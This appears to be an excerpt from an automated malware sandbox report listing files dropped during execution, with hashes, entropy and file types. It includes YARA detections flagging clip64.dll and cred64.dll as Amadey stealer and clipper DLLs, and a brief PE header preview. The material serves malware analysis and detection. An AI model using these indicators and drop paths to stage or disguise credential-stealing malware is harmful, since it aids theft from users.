                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                      Entropy (8bit):3.9802036404605685
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8HdpTxpNHbidAKZdA19ehwiZUklqehJy+3:8b7DCy
                                                                                                                                                                                                                                      MD5:A0006DD67AFEED2A9EBEE1DB724970C5
                                                                                                                                                                                                                                      SHA1:94D1A4FCC55F66BC64FC226C7186C49BE81000F4
                                                                                                                                                                                                                                      SHA-256:037BF298C657B0E5285EF93B61D298BEEE86F8514F5EF2BA66092FAEBE380178
                                                                                                                                                                                                                                      SHA-512:462D116259454DAF86E041D0733F7707718F0F428C87A725BCF92ED5EF4931B7D3CD66AD26AB5434AB82059B5188304FE3FB7D7EDF23B0FFC55A49F5EFEA1DF7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                      Entropy (8bit):3.9937518083094035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8KdpTxpNHbidAKZdA1weh/iZUkAQkqehyy+2:8o7x9Qjy
                                                                                                                                                                                                                                      MD5:A091690B7687A8E1CED0BC4CB0124CC5
                                                                                                                                                                                                                                      SHA1:1BB2177F10084EAB7033D784C0EA312EBC4FDDA5
                                                                                                                                                                                                                                      SHA-256:0BEB85F900BDED86D09046FBDE171032AD16D549FD0267756FF2B855E4F01CB3
                                                                                                                                                                                                                                      SHA-512:5253ED2FC84D1B50288AD467CD6A22A7AE1B209F5B6A4D7323D4D0E9448A9105543E18581C672FF7DCBFF6C2CA46FEAFBCE8D06EA0B1B4AEC6063060B874FF61
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2693
                                                                                                                                                                                                                                      Entropy (8bit):4.006248144561485
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8xydpTxpsHbidAKZdA14tseh7sFiZUkmgqeh7sky+BX:8xQ7ynmy
                                                                                                                                                                                                                                      MD5:23A7023EE9C3A64C983E887CB8457C6D
                                                                                                                                                                                                                                      SHA1:F27A403757FC01EDD5CC013265BCB68B3E87D144
                                                                                                                                                                                                                                      SHA-256:D4EFC43BA888EE47C9047CCB9529F03B61C99680E4BFEF328AA0A0D4AAB9FD6D
                                                                                                                                                                                                                                      SHA-512:CB987CDE967E47CA0A38953A885003E1B82ED84F9F05EB4A43022C68A8F2E128C9DCF1263ADB1F882A947077480F7084A77B40F8CBA8CD5F27BD7E6A6E7EA2E5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2681
                                                                                                                                                                                                                                      Entropy (8bit):3.9909222948315253
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8odpTxpNHbidAKZdA1vehDiZUkwqeh+y+R:8e7y8y
                                                                                                                                                                                                                                      MD5:A30DD319B16171964F31D8C3C3759314
                                                                                                                                                                                                                                      SHA1:CFCF154147A8E20F81C8C0B759DE504214B40DBD
                                                                                                                                                                                                                                      SHA-256:3FF4E05704B30854E16F9F1BBA24C876FAC0762A2337C5FF7246853A858610FB
                                                                                                                                                                                                                                      SHA-512:900A59A3B8A9A2D3BAACB913FAE258E92A3981D010EC69F47818384148AFFF201EFB8F4B740A218A44F48C886A59CC37EC7063D0CFF260916EEDE196C488AB4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2681
                                                                                                                                                                                                                                      Entropy (8bit):3.983864480051781
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8rdpTxpNHbidAKZdA1hehBiZUk1W1qeh4y+C:8v7C9Yy
                                                                                                                                                                                                                                      MD5:17DF014CD2C48DF90CE0C2191966532F
                                                                                                                                                                                                                                      SHA1:591DE1AA94BE135611F62C5379FD4497A26CF2C4
                                                                                                                                                                                                                                      SHA-256:F5ADC30964850F4FBD0D12407BA612951A6AAE0BC9144385FAB0D337A59FF441
                                                                                                                                                                                                                                      SHA-512:55A06C0D9E923D6A963630286185D19F42D35D4617769768FEEBFB1901619370E564D1A3694286C6F5D6D1DBD261FA3768818048AC4722C4CC6F9C097D156497
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 00:29:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2683
                                                                                                                                                                                                                                      Entropy (8bit):3.9983661503885397
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:8wdpTxpNHbidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8m78T/TbxWOvTbmy7T
                                                                                                                                                                                                                                      MD5:1721FCEF73270FB994450587DBF92C88
                                                                                                                                                                                                                                      SHA1:71C5599092B7029DF8C208FB5A246DBB40AA686E
                                                                                                                                                                                                                                      SHA-256:27757CB1B9CBB63872BBA383962877AD33FD78A47EE2444F69B8A15731759A31
                                                                                                                                                                                                                                      SHA-512:0499B8B74C64942DF46D486F986B20FCC5A05E492801288834ED4FFBF640BC13D3BB55A2830946FE95630F33A885E6E5B0050BF2042A9F4793000830BF5E3511
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400158525810517
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                                                                                                                                                      MD5:726CD06231883A159EC1CE28DD538699
                                                                                                                                                                                                                                      SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                                                                                                                                                      SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                                                                                                                                                      SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460494158653329
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                                                                                                                                                      MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                                                                                                                                                      SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                                                                                                                                                      SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                                                                                                                                                      SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 78%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d...i..e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400356358225577
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
